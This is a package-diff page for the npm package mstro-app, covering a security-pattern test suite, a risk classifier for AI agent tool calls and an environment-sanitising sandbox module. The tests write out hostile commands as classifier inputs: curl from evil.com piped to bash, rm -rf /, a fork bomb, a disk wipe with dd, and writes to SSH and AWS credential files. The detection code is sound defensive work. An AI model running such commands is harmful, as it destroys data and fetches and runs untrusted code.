npm - mstro-app - Versions diffs - 0.1.58 → 0.3.0 - Mend

mstro-app 0.1.58 → 0.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (161) hide show

package/PRIVACY.md +126 -0
package/README.md +24 -23
package/bin/commands/login.js +85 -42
package/bin/commands/logout.js +35 -1
package/bin/commands/status.js +1 -1
package/bin/mstro.js +231 -131
package/dist/server/cli/headless/claude-invoker.d.ts.map +1 -1
package/dist/server/cli/headless/claude-invoker.js +550 -115
package/dist/server/cli/headless/claude-invoker.js.map +1 -1
package/dist/server/cli/headless/index.d.ts +2 -1
package/dist/server/cli/headless/index.d.ts.map +1 -1
package/dist/server/cli/headless/index.js +2 -0
package/dist/server/cli/headless/index.js.map +1 -1
package/dist/server/cli/headless/prompt-utils.d.ts +5 -8
package/dist/server/cli/headless/prompt-utils.d.ts.map +1 -1
package/dist/server/cli/headless/prompt-utils.js +40 -5
package/dist/server/cli/headless/prompt-utils.js.map +1 -1
package/dist/server/cli/headless/runner.d.ts +1 -1
package/dist/server/cli/headless/runner.d.ts.map +1 -1
package/dist/server/cli/headless/runner.js +52 -7
package/dist/server/cli/headless/runner.js.map +1 -1
package/dist/server/cli/headless/stall-assessor.d.ts +79 -1
package/dist/server/cli/headless/stall-assessor.d.ts.map +1 -1
package/dist/server/cli/headless/stall-assessor.js +355 -20
package/dist/server/cli/headless/stall-assessor.js.map +1 -1
package/dist/server/cli/headless/tool-watchdog.d.ts +70 -0
package/dist/server/cli/headless/tool-watchdog.d.ts.map +1 -0
package/dist/server/cli/headless/tool-watchdog.js +302 -0
package/dist/server/cli/headless/tool-watchdog.js.map +1 -0
package/dist/server/cli/headless/types.d.ts +98 -1
package/dist/server/cli/headless/types.d.ts.map +1 -1
package/dist/server/cli/improvisation-session-manager.d.ts +136 -2
package/dist/server/cli/improvisation-session-manager.d.ts.map +1 -1
package/dist/server/cli/improvisation-session-manager.js +929 -132
package/dist/server/cli/improvisation-session-manager.js.map +1 -1
package/dist/server/index.js +5 -13
package/dist/server/index.js.map +1 -1
package/dist/server/mcp/bouncer-integration.d.ts.map +1 -1
package/dist/server/mcp/bouncer-integration.js +18 -0
package/dist/server/mcp/bouncer-integration.js.map +1 -1
package/dist/server/mcp/security-audit.d.ts +2 -2
package/dist/server/mcp/security-audit.d.ts.map +1 -1
package/dist/server/mcp/security-audit.js +12 -8
package/dist/server/mcp/security-audit.js.map +1 -1
package/dist/server/mcp/security-patterns.d.ts.map +1 -1
package/dist/server/mcp/security-patterns.js +9 -4
package/dist/server/mcp/security-patterns.js.map +1 -1
package/dist/server/routes/improvise.js +6 -6
package/dist/server/routes/improvise.js.map +1 -1
package/dist/server/services/analytics.d.ts +2 -0
package/dist/server/services/analytics.d.ts.map +1 -1
package/dist/server/services/analytics.js +26 -4
package/dist/server/services/analytics.js.map +1 -1
package/dist/server/services/platform.d.ts.map +1 -1
package/dist/server/services/platform.js +17 -10
package/dist/server/services/platform.js.map +1 -1
package/dist/server/services/sandbox-utils.d.ts +6 -0
package/dist/server/services/sandbox-utils.d.ts.map +1 -0
package/dist/server/services/sandbox-utils.js +72 -0
package/dist/server/services/sandbox-utils.js.map +1 -0
package/dist/server/services/settings.d.ts +6 -0
package/dist/server/services/settings.d.ts.map +1 -1
package/dist/server/services/settings.js +21 -0
package/dist/server/services/settings.js.map +1 -1
package/dist/server/services/terminal/pty-manager.d.ts +5 -51
package/dist/server/services/terminal/pty-manager.d.ts.map +1 -1
package/dist/server/services/terminal/pty-manager.js +63 -102
package/dist/server/services/terminal/pty-manager.js.map +1 -1
package/dist/server/services/websocket/file-explorer-handlers.d.ts +5 -0
package/dist/server/services/websocket/file-explorer-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/file-explorer-handlers.js +518 -0
package/dist/server/services/websocket/file-explorer-handlers.js.map +1 -0
package/dist/server/services/websocket/git-handlers.d.ts +36 -0
package/dist/server/services/websocket/git-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/git-handlers.js +797 -0
package/dist/server/services/websocket/git-handlers.js.map +1 -0
package/dist/server/services/websocket/git-pr-handlers.d.ts +4 -0
package/dist/server/services/websocket/git-pr-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/git-pr-handlers.js +299 -0
package/dist/server/services/websocket/git-pr-handlers.js.map +1 -0
package/dist/server/services/websocket/git-worktree-handlers.d.ts +4 -0
package/dist/server/services/websocket/git-worktree-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/git-worktree-handlers.js +353 -0
package/dist/server/services/websocket/git-worktree-handlers.js.map +1 -0
package/dist/server/services/websocket/handler-context.d.ts +32 -0
package/dist/server/services/websocket/handler-context.d.ts.map +1 -0
package/dist/server/services/websocket/handler-context.js +4 -0
package/dist/server/services/websocket/handler-context.js.map +1 -0
package/dist/server/services/websocket/handler.d.ts +27 -338
package/dist/server/services/websocket/handler.d.ts.map +1 -1
package/dist/server/services/websocket/handler.js +74 -2106
package/dist/server/services/websocket/handler.js.map +1 -1
package/dist/server/services/websocket/index.d.ts +1 -1
package/dist/server/services/websocket/index.d.ts.map +1 -1
package/dist/server/services/websocket/index.js.map +1 -1
package/dist/server/services/websocket/session-handlers.d.ts +10 -0
package/dist/server/services/websocket/session-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/session-handlers.js +507 -0
package/dist/server/services/websocket/session-handlers.js.map +1 -0
package/dist/server/services/websocket/settings-handlers.d.ts +6 -0
package/dist/server/services/websocket/settings-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/settings-handlers.js +125 -0
package/dist/server/services/websocket/settings-handlers.js.map +1 -0
package/dist/server/services/websocket/tab-handlers.d.ts +10 -0
package/dist/server/services/websocket/tab-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/tab-handlers.js +131 -0
package/dist/server/services/websocket/tab-handlers.js.map +1 -0
package/dist/server/services/websocket/terminal-handlers.d.ts +9 -0
package/dist/server/services/websocket/terminal-handlers.d.ts.map +1 -0
package/dist/server/services/websocket/terminal-handlers.js +220 -0
package/dist/server/services/websocket/terminal-handlers.js.map +1 -0
package/dist/server/services/websocket/types.d.ts +67 -2
package/dist/server/services/websocket/types.d.ts.map +1 -1
package/hooks/bouncer.sh +11 -4
package/package.json +7 -2
package/server/README.md +176 -159
package/server/cli/headless/claude-invoker.ts +740 -133
package/server/cli/headless/index.ts +7 -1
package/server/cli/headless/output-utils.test.ts +225 -0
package/server/cli/headless/prompt-utils.ts +37 -5
package/server/cli/headless/runner.ts +55 -8
package/server/cli/headless/stall-assessor.test.ts +165 -0
package/server/cli/headless/stall-assessor.ts +478 -22
package/server/cli/headless/tool-watchdog.test.ts +429 -0
package/server/cli/headless/tool-watchdog.ts +398 -0
package/server/cli/headless/types.ts +93 -1
package/server/cli/improvisation-session-manager.ts +1133 -145
package/server/index.ts +5 -14
package/server/mcp/README.md +59 -67
package/server/mcp/bouncer-integration.test.ts +161 -0
package/server/mcp/bouncer-integration.ts +28 -0
package/server/mcp/security-audit.ts +12 -8
package/server/mcp/security-patterns.test.ts +258 -0
package/server/mcp/security-patterns.ts +8 -2
package/server/routes/improvise.ts +6 -6
package/server/services/analytics.ts +26 -4
package/server/services/platform.test.ts +0 -10
package/server/services/platform.ts +16 -11
package/server/services/sandbox-utils.ts +78 -0
package/server/services/settings.ts +25 -0
package/server/services/terminal/pty-manager.ts +68 -129
package/server/services/websocket/autocomplete.test.ts +194 -0
package/server/services/websocket/file-explorer-handlers.ts +587 -0
package/server/services/websocket/git-handlers.ts +924 -0
package/server/services/websocket/git-pr-handlers.ts +363 -0
package/server/services/websocket/git-worktree-handlers.ts +403 -0
package/server/services/websocket/handler-context.ts +44 -0
package/server/services/websocket/handler.test.ts +1 -1
package/server/services/websocket/handler.ts +90 -2421
package/server/services/websocket/index.ts +1 -1
package/server/services/websocket/session-handlers.ts +574 -0
package/server/services/websocket/settings-handlers.ts +150 -0
package/server/services/websocket/tab-handlers.ts +150 -0
package/server/services/websocket/terminal-handlers.ts +277 -0
package/server/services/websocket/types.ts +145 -4
package/bin/release.sh +0 -110
package/dist/server/services/terminal/tmux-manager.d.ts +0 -82
package/dist/server/services/terminal/tmux-manager.d.ts.map +0 -1
package/dist/server/services/terminal/tmux-manager.js +0 -352
package/dist/server/services/terminal/tmux-manager.js.map +0 -1
package/server/services/terminal/tmux-manager.ts +0 -426

package/server/mcp/security-patterns.test.ts ADDED Viewed

@@ -0,0 +1,258 @@
+import { describe, expect, it } from 'vitest';
+import {
+  CRITICAL_THREATS,
+  classifyRisk,
+  isSensitivePath,
+  matchesPattern,
+  requiresAIReview,
+  SAFE_OPERATIONS,
+} from './security-patterns.js';
+// ========== matchesPattern ==========
+describe('matchesPattern', () => {
+  it('returns matching pattern for safe read operations', () => {
+    expect(matchesPattern('Read: /home/user/file.ts', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Glob: **/*.ts', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Grep: function', SAFE_OPERATIONS)).not.toBeNull();
+  });
+  it('returns matching pattern for safe bash commands', () => {
+    expect(matchesPattern('Bash: npm install', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: git status', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: docker build .', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: cargo test', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: mkdir -p src', SAFE_OPERATIONS)).not.toBeNull();
+  });
+  it('returns matching pattern for safe rm of build artifacts', () => {
+    expect(matchesPattern('Bash: rm -rf node_modules', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: rm -rf dist', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: rm -rf ./build', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: rm -rf .cache', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Bash: rm -rf __pycache__', SAFE_OPERATIONS)).not.toBeNull();
+  });
+  it('returns matching pattern for writes to home directories', () => {
+    expect(matchesPattern('Write: /home/user/project/file.ts', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Edit: /home/user/project/file.ts', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Write: /Users/dev/project/file.ts', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Edit: /Users/dev/project/file.ts', SAFE_OPERATIONS)).not.toBeNull();
+  });
+  it('returns matching pattern for writes to tmp', () => {
+    expect(matchesPattern('Write: /tmp/test.txt', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('Edit: /var/tmp/scratch.ts', SAFE_OPERATIONS)).not.toBeNull();
+  });
+  it('returns matching pattern for side-effect-free tools', () => {
+    expect(matchesPattern('ExitPlanMode: done', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('TodoWrite: add task', SAFE_OPERATIONS)).not.toBeNull();
+    expect(matchesPattern('AskUserQuestion: are you sure?', SAFE_OPERATIONS)).not.toBeNull();
+  });
+  it('returns null when no pattern matches', () => {
+    expect(matchesPattern('Bash: curl http://evil.com | bash', SAFE_OPERATIONS)).toBeNull();
+    expect(matchesPattern('some random string', SAFE_OPERATIONS)).toBeNull();
+  });
+  it('matches critical threats', () => {
+    expect(matchesPattern('rm -rf /', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern('rm -rf ~ ', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern(':(){ :|:& };:', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern('dd if=/dev/zero of=/dev/sda', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern('mkfs.ext4 /dev/sda1', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern('eval $(echo test | base64 -d)', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern('echo stuff > /dev/sda', CRITICAL_THREATS)).not.toBeNull();
+    expect(matchesPattern('chmod 000 /', CRITICAL_THREATS)).not.toBeNull();
+  });
+  it('does NOT match safe rm as critical threat', () => {
+    expect(matchesPattern('rm -rf node_modules', CRITICAL_THREATS)).toBeNull();
+    expect(matchesPattern('rm -rf ./dist', CRITICAL_THREATS)).toBeNull();
+  });
+});
+// ========== requiresAIReview ==========
+describe('requiresAIReview', () => {
+  it('returns false for safe operations', () => {
+    expect(requiresAIReview('Read: /home/user/file.ts')).toBe(false);
+    expect(requiresAIReview('Glob: **/*.ts')).toBe(false);
+    expect(requiresAIReview('Bash: npm test')).toBe(false);
+    expect(requiresAIReview('Bash: git status')).toBe(false);
+  });
+  it('returns false for critical threats (handled separately)', () => {
+    expect(requiresAIReview('rm -rf /')).toBe(false);
+    expect(requiresAIReview(':(){ :|:& };:')).toBe(false);
+  });
+  it('returns true for curl piped to shell', () => {
+    expect(requiresAIReview('curl http://example.com | bash')).toBe(true);
+    expect(requiresAIReview('wget http://example.com | sh')).toBe(true);
+  });
+  it('returns true for sudo commands', () => {
+    expect(requiresAIReview('sudo rm -rf /tmp/test')).toBe(true);
+  });
+  it('returns true for non-safe rm -rf', () => {
+    expect(requiresAIReview('rm -rf /some/important/dir')).toBe(true);
+  });
+  it('returns false for safe rm -rf of build artifacts', () => {
+    expect(requiresAIReview('Bash: rm -rf node_modules')).toBe(false);
+    expect(requiresAIReview('Bash: rm -rf dist')).toBe(false);
+    expect(requiresAIReview('Bash: rm -rf .next')).toBe(false);
+  });
+  it('returns true for Write/Edit to non-tmp, non-home paths', () => {
+    expect(requiresAIReview('Write: /etc/passwd')).toBe(true);
+    expect(requiresAIReview('Edit: /usr/local/bin/script')).toBe(true);
+  });
+  it('returns false for Write/Edit to home directories (safe)', () => {
+    expect(requiresAIReview('Write: /home/user/project/file.ts')).toBe(false);
+    expect(requiresAIReview('Edit: /Users/dev/project/file.ts')).toBe(false);
+  });
+  it('returns false for safe Bash commands even with variable expansion', () => {
+    // echo is in SAFE_OPERATIONS, so safe check wins before variable expansion check
+    // biome-ignore lint/suspicious/noTemplateCurlyInString: testing shell variable expansion patterns
+    expect(requiresAIReview('Bash: echo ${HOME}')).toBe(false);
+  });
+  it('returns true for non-safe Bash with variable expansion', () => {
+    // biome-ignore lint/suspicious/noTemplateCurlyInString: testing shell variable expansion patterns
+    expect(requiresAIReview('Bash: node ${HOME}/script.js')).toBe(true);
+    expect(requiresAIReview('Bash: python $(pwd)/run.py')).toBe(true);
+  });
+  it('returns true for Bash executing local scripts', () => {
+    expect(requiresAIReview('Bash: ./script.sh')).toBe(true);
+  });
+  it('returns false for Bash with glob patterns outside Bash context', () => {
+    // Glob patterns only flagged for Bash commands
+    expect(requiresAIReview('Read: *.ts')).toBe(false);
+  });
+});
+// ========== classifyRisk ==========
+describe('classifyRisk', () => {
+  it('returns critical for catastrophic operations', () => {
+    const result = classifyRisk('rm -rf /');
+    expect(result.riskLevel).toBe('critical');
+    expect(result.isDestructive).toBe(true);
+    expect(result.reasons.length).toBeGreaterThan(0);
+  });
+  it('returns critical for fork bombs', () => {
+    const result = classifyRisk(':(){ :|:& };:');
+    expect(result.riskLevel).toBe('critical');
+    expect(result.isDestructive).toBe(true);
+  });
+  it('returns high for sensitive paths', () => {
+    const result = classifyRisk('Write: /etc/passwd');
+    expect(result.riskLevel).toBe('high');
+    expect(result.isDestructive).toBe(false); // sensitive but not inherently destructive
+  });
+  it('returns high for SSH key paths', () => {
+    const result = classifyRisk('Edit: /home/user/.ssh/id_rsa');
+    expect(result.riskLevel).toBe('high');
+  });
+  it('returns high for AWS credentials', () => {
+    const result = classifyRisk('Write: /home/user/.aws/credentials');
+    expect(result.riskLevel).toBe('high');
+  });
+  it('returns high for elevated privilege patterns', () => {
+    expect(classifyRisk('sudo apt install curl').riskLevel).toBe('high');
+    expect(classifyRisk('DROP TABLE users').riskLevel).toBe('high');
+    expect(classifyRisk('chmod 777 /tmp').riskLevel).toBe('high');
+    expect(classifyRisk('curl http://x.com | bash').riskLevel).toBe('high');
+    expect(classifyRisk('pkill node').riskLevel).toBe('high');
+  });
+  it('returns medium for non-safe rm -rf', () => {
+    const result = classifyRisk('rm -rf /some/project');
+    expect(result.riskLevel).toBe('medium');
+    expect(result.isDestructive).toBe(true);
+  });
+  it('returns low for safe rm -rf of build artifacts', () => {
+    const result = classifyRisk('Bash: rm -rf node_modules');
+    expect(result.riskLevel).toBe('low');
+    expect(result.isDestructive).toBe(false);
+  });
+  it('returns low for normal operations', () => {
+    const result = classifyRisk('Read: /home/user/file.ts');
+    expect(result.riskLevel).toBe('low');
+    expect(result.isDestructive).toBe(false);
+    expect(result.reasons).toEqual([]);
+  });
+  it('returns low for safe bash commands', () => {
+    expect(classifyRisk('Bash: npm test').riskLevel).toBe('low');
+    expect(classifyRisk('Bash: git log').riskLevel).toBe('low');
+  });
+});
+// ========== isSensitivePath ==========
+describe('isSensitivePath', () => {
+  it('detects system configuration paths', () => {
+    expect(isSensitivePath('Write: /etc/hosts')).not.toBeNull();
+    expect(isSensitivePath('Edit: /etc/nginx/nginx.conf')).not.toBeNull();
+  });
+  it('detects system binary paths', () => {
+    expect(isSensitivePath('Write: /bin/bash')).not.toBeNull();
+    expect(isSensitivePath('Edit: /usr/bin/node')).not.toBeNull();
+  });
+  it('detects boot directory', () => {
+    expect(isSensitivePath('Write: /boot/grub/grub.cfg')).not.toBeNull();
+  });
+  it('detects credential files', () => {
+    expect(isSensitivePath('Write: /home/user/.ssh/id_rsa')).not.toBeNull();
+    expect(isSensitivePath('Edit: /home/user/.gnupg/pubring.kbx')).not.toBeNull();
+    expect(isSensitivePath('Write: /home/user/.aws/credentials')).not.toBeNull();
+    expect(isSensitivePath('Edit: /home/user/.aws/config')).not.toBeNull();
+  });
+  it('detects env files', () => {
+    expect(isSensitivePath('Write: /home/user/project/.env')).not.toBeNull();
+    expect(isSensitivePath('Edit: /home/user/project/.env.local')).not.toBeNull();
+    expect(isSensitivePath('Write: /home/user/project/.env.production')).not.toBeNull();
+  });
+  it('detects shell profiles', () => {
+    expect(isSensitivePath('Write: /home/user/.bashrc')).not.toBeNull();
+    expect(isSensitivePath('Edit: /home/user/.zshrc')).not.toBeNull();
+    expect(isSensitivePath('Write: /home/user/.profile')).not.toBeNull();
+  });
+  it('detects macOS system paths', () => {
+    expect(isSensitivePath('Write: /System/Library/something')).not.toBeNull();
+    expect(isSensitivePath('Edit: /Library/LaunchDaemons/com.example.plist')).not.toBeNull();
+  });
+  it('returns null for safe paths', () => {
+    expect(isSensitivePath('Write: /home/user/project/src/index.ts')).toBeNull();
+    expect(isSensitivePath('Read: /etc/passwd')).toBeNull(); // Read, not Write
+    expect(isSensitivePath('Bash: npm test')).toBeNull();
+  });
+  it('only triggers on Write/Edit, not Read', () => {
+    expect(isSensitivePath('Read: /etc/passwd')).toBeNull();
+    expect(isSensitivePath('Write: /etc/passwd')).not.toBeNull();
+  });
+});

package/server/mcp/security-patterns.ts CHANGED Viewed

@@ -125,6 +125,9 @@ export const SAFE_OPERATIONS: SecurityPattern[] = [
   // Write/Edit to temp directories - ephemeral, low risk
   { pattern: /^(Write|Edit):\s*\/tmp\//i },
   { pattern: /^(Write|Edit):\s*\/var\/tmp\//i },
+  // Side-effect-free tools - no dangerous operations possible
+  { pattern: /^(ExitPlanMode|EnterPlanMode|TodoWrite|AskUserQuestion):/i },
 ];
 /**
@@ -201,8 +204,11 @@ export function requiresAIReview(operation: string): boolean {
     return !SAFE_RM_PATTERNS.some(p => p.test(operation));
   }
-  if (/\$\{.*\}|\$\(.*\)/.test(operation) || /\*\*?/.test(operation)) return true;
-  if (/^Bash:\s*\.\//.test(operation)) return true;
+  // Variable expansion and glob patterns are only concerning in Bash commands
+  if (/^Bash:/.test(operation)) {
+    if (/\$\{.*\}|\$\(.*\)/.test(operation) || /\*\*?/.test(operation)) return true;
+    if (/^Bash:\s*\.\//.test(operation)) return true;
+  }
   return false;
 }

package/server/routes/improvise.ts CHANGED Viewed

@@ -15,20 +15,20 @@ export function createImproviseRoutes(workingDir: string) {
   routes.get('/sessions', async (c) => {
     try {
-      const sessionsDir = join(workingDir, '.mstro', 'improvise')
+      const sessionsDir = join(workingDir, '.mstro', 'history')
       const { readdirSync, existsSync, readFileSync } = await import('node:fs')
       if (!existsSync(sessionsDir)) {
         return c.json({ sessions: [] })
       }
-      // Look for history-*.json files in the improvise directory
+      // Look for *.json files in the history directory
       const historyFiles = readdirSync(sessionsDir)
-        .filter((name: string) => name.startsWith('history-') && name.endsWith('.json'))
+        .filter((name: string) => name.endsWith('.json'))
         .sort((a: string, b: string) => {
           // Sort by timestamp in filename (newer first)
-          const timestampA = parseInt(a.replace('history-', '').replace('.json', ''), 10)
-          const timestampB = parseInt(b.replace('history-', '').replace('.json', ''), 10)
+          const timestampA = parseInt(a.replace('.json', ''), 10)
+          const timestampB = parseInt(b.replace('.json', ''), 10)
           return timestampB - timestampA
         })
@@ -64,7 +64,7 @@ export function createImproviseRoutes(workingDir: string) {
       const { sessionId } = c.req.param()
       // Extract timestamp from sessionId (e.g., "improv-1234567890" -> "1234567890")
       const timestamp = sessionId.replace('improv-', '')
-      const historyPath = join(workingDir, '.mstro', 'improvise', `history-${timestamp}.json`)
+      const historyPath = join(workingDir, '.mstro', 'history', `${timestamp}.json`)
       const { existsSync, readFileSync } = await import('node:fs')
       if (!existsSync(historyPath)) {

package/server/services/analytics.ts CHANGED Viewed

@@ -23,7 +23,19 @@ import { getClientId } from './client-id.js'
 const MSTRO_DIR = join(homedir(), '.mstro')
 const CONFIG_FILE = join(MSTRO_DIR, 'config.json')
-const PLATFORM_URL = process.env.PLATFORM_URL || 'https://api.mstro.app'
+// Read SERVER_URL from ~/.mstro/.env if it exists (for local dev)
+function getServerUrl(): string {
+  try {
+    const envPath = join(MSTRO_DIR, '.env')
+    const content = readFileSync(envPath, 'utf-8')
+    const match = content.match(/^SERVER_URL=(.+)$/m)
+    if (match) return match[1].trim()
+  } catch {}
+  return 'https://api.mstro.app'
+}
+const PLATFORM_URL = process.env.PLATFORM_URL || getServerUrl()
 let client: PostHog | null = null
 let telemetryEnabled: boolean | null = null
@@ -109,11 +121,15 @@ export async function initAnalytics(): Promise<void> {
   }
   client = new PostHog(analyticsConfig.posthogKey, {
-    host: analyticsConfig.posthogHost,
-    // Flush events every 10 seconds or 20 events
+    // Route through platform server proxy (like web/ does) to avoid
+    // direct PostHog DNS lookups and ad-blocker/firewall issues
+    host: `${PLATFORM_URL}/a`,
     flushAt: 20,
     flushInterval: 10000,
   })
+  // Silently swallow analytics errors — never surface to user terminal
+  client.on('error', () => {})
 }
 /**
@@ -122,7 +138,11 @@ export async function initAnalytics(): Promise<void> {
  */
 export async function shutdownAnalytics(): Promise<void> {
   if (client) {
-    await client.shutdown()
+    try {
+      await client.shutdown()
+    } catch {
+      // Ignore shutdown errors (network may be unavailable)
+    }
     client = null
   }
 }
@@ -263,6 +283,8 @@ export const AnalyticsEvents = {
   IMPROVISE_MOVEMENT_ERROR: 'improvise_movement_error',
   IMPROVISE_SESSION_ENDED: 'improvise_session_ended',
   IMPROVISE_ABORTED: 'improvise_aborted',
+  IMPROVISE_TOOL_TIMEOUT: 'improvise_tool_timeout',
+  IMPROVISE_AUTO_RETRY: 'improvise_auto_retry',
   // Terminal events
   TERMINAL_SESSION_CREATED: 'terminal_session_created',

package/server/services/platform.test.ts CHANGED Viewed

@@ -31,10 +31,6 @@ const mockClientId = {
   getClientId: vi.fn(),
 }
-const mockTmux = {
-  isTmuxAvailable: vi.fn(),
-}
 // Mock fetch globally
 global.fetch = vi.fn()
@@ -115,7 +111,6 @@ vi.mock('fs', () => mockFs)
 vi.mock('os', () => mockOs)
 vi.mock('path', () => mockPath)
 vi.mock('./client-id.js', () => mockClientId)
-vi.mock('./terminal/tmux-manager.js', () => mockTmux)
 // Mock undici WebSocket for Node 18-20 compatibility
 vi.mock('undici', () => ({
@@ -150,8 +145,6 @@ describe('Platform Connection Service', () => {
     mockOs.type.mockReturnValue('Linux')
     mockOs.arch.mockReturnValue('x64')
     mockClientId.getClientId.mockReturnValue('test-client-id-123')
-    mockTmux.isTmuxAvailable.mockReturnValue(true)
     // Mock process.version
     Object.defineProperty(process, 'version', {
       value: 'v22.0.0',
@@ -410,14 +403,11 @@ describe('Platform Connection Service', () => {
           })
         )
-        mockTmux.isTmuxAvailable.mockReturnValue(true)
         const connection = new PlatformConnection('/test/dir')
         connection.connect()
         const wsUrl = WebSocketConstructor.mock.calls[0][0]
         expect(wsUrl).toContain('capabilities=')
-        expect(wsUrl).toContain('tmux')
       })
       it('should use custom platform URL when provided', () => {

package/server/services/platform.ts CHANGED Viewed

@@ -20,7 +20,6 @@ import { basename, join } from 'node:path'
 import { AnalyticsEvents, trackEvent } from './analytics.js'
 import { getClientId } from './client-id.js'
 import { captureException } from './sentry.js'
-import { isTmuxAvailable } from './terminal/tmux-manager.js'
 const MSTRO_DIR = join(homedir(), '.mstro')
 const CREDENTIALS_FILE = join(MSTRO_DIR, 'credentials.json')
@@ -103,7 +102,18 @@ if (typeof WebSocket !== 'undefined') {
   WebSocketImpl = WS as unknown as typeof WebSocket
 }
-const DEFAULT_PLATFORM_URL = process.env.PLATFORM_URL || 'https://api.mstro.app'
+// Read SERVER_URL from ~/.mstro/.env if it exists (for local dev)
+function getServerUrl(): string {
+  try {
+    const envPath = join(MSTRO_DIR, '.env')
+    const content = readFileSync(envPath, 'utf-8')
+    const match = content.match(/^SERVER_URL=(.+)$/m)
+    if (match) return match[1].trim()
+  } catch {}
+  return 'https://api.mstro.app'
+}
+const DEFAULT_PLATFORM_URL = process.env.PLATFORM_URL || getServerUrl()
 interface ConnectionCallbacks {
   onConnected?: (connectionId: string) => void
@@ -242,9 +252,6 @@ export class PlatformConnection {
       return
     }
-    // Check for tmux availability (for persistent terminals)
-    const hasTmux = isTmuxAvailable()
     // Build URL params WITHOUT the auth token — token is sent post-connection
     // to avoid leaking it in proxy logs, browser history, and server access logs
     const params = new URLSearchParams({
@@ -256,7 +263,7 @@ export class PlatformConnection {
       nodeVersion,
       osType,
       cpuArch,
-      capabilities: JSON.stringify({ tmux: hasTmux })
+      capabilities: JSON.stringify({})
     })
     const wsUrl = `${this.platformUrl.replace(/^http/, 'ws')}/ws/client?${params}`
@@ -284,7 +291,7 @@ export class PlatformConnection {
     this.ws.onopen = () => {
       clearTimeout(connectionTimeout)
-      console.log(`🌐 Connected to platform`)
+      // Platform WebSocket open — auth will follow
       // Send auth token as first message instead of URL param
       this.ws!.send(JSON.stringify({ type: 'auth', token: authToken }))
@@ -332,7 +339,7 @@ export class PlatformConnection {
           return
         }
-        console.log('Disconnected from platform, reconnecting...')
+        console.log('Disconnected, reconnecting...')
         this.callbacks.onDisconnected?.()
         trackEvent(AnalyticsEvents.PLATFORM_DISCONNECTED)
         this.scheduleReconnect()
@@ -349,20 +356,18 @@ export class PlatformConnection {
       case 'paired':
         this.isConnected = true
         this.connectionId = message.connectionId
-        console.log(`⚡ Connected to mstro.app!`)
+        // Connection status printed by onConnected callback
         // Start heartbeat to keep server-side TTL refreshed
         this.startHeartbeat()
         this.callbacks.onConnected?.(message.connectionId)
         break
       case 'web_connected':
-        console.log('🔗 Web client connected')
         this.callbacks.onWebConnected?.()
         trackEvent(AnalyticsEvents.WEB_CLIENT_CONNECTED)
         break
       case 'web_disconnected':
-        console.log('🔗 Web client disconnected')
         this.callbacks.onWebDisconnected?.()
         trackEvent(AnalyticsEvents.WEB_CLIENT_DISCONNECTED)
         break

package/server/services/sandbox-utils.ts ADDED Viewed

@@ -0,0 +1,78 @@
+// Copyright (c) 2025-present Mstro, Inc. All rights reserved.
+// Licensed under the MIT License. See LICENSE file for details.
+/**
+ * Sandbox Utilities
+ *
+ * Environment sanitization for sandboxed shared sessions.
+ * Used by both PTY manager (terminal) and Claude invoker (prompts)
+ * to restrict shared users to the project directory.
+ */
+/** Env var prefixes that may contain secrets or grant access outside the project */
+const BLOCKED_PREFIXES = [
+  'AWS_',
+  'GITHUB_',
+  'GH_',
+  'NPM_',
+  'DOCKER_',
+  'SSH_',
+  'GPG_',
+  'AZURE_',
+  'GCP_',
+  'GOOGLE_',
+  'OPENAI_',
+  'ANTHROPIC_',
+  'STRIPE_',
+  'TWILIO_',
+  'SENDGRID_',
+  'DATADOG_',
+  'SENTRY_',
+  'SLACK_',
+  'DISCORD_',
+];
+/** Specific env vars that may contain secrets or sensitive paths */
+const BLOCKED_KEYS = new Set([
+  'HISTFILE',
+  'LESSHISTFILE',
+  'MYSQL_PWD',
+  'PGPASSWORD',
+  'PGPASSFILE',
+  'REDIS_URL',
+  'DATABASE_URL',
+  'MONGO_URI',
+  'MONGODB_URI',
+  'SECRET_KEY',
+  'API_KEY',
+  'API_SECRET',
+  'ACCESS_TOKEN',
+  'REFRESH_TOKEN',
+  'PRIVATE_KEY',
+  'JWT_SECRET',
+]);
+/**
+ * Create a sanitized environment for sandboxed execution.
+ * Strips sensitive env vars and sets HOME to the project directory.
+ */
+export function sanitizeEnvForSandbox(
+  env: NodeJS.ProcessEnv,
+  workingDir: string
+): Record<string, string> {
+  const result: Record<string, string> = {};
+  for (const [key, value] of Object.entries(env)) {
+    if (!value) continue;
+    if (BLOCKED_KEYS.has(key)) continue;
+    if (BLOCKED_PREFIXES.some(p => key.startsWith(p))) continue;
+    result[key] = value;
+  }
+  // Override HOME to project directory so `cd ~` stays sandboxed
+  result.HOME = workingDir;
+  // Marker so scripts can detect sandboxed execution
+  result.MSTRO_SANDBOXED = '1';
+  return result;
+}

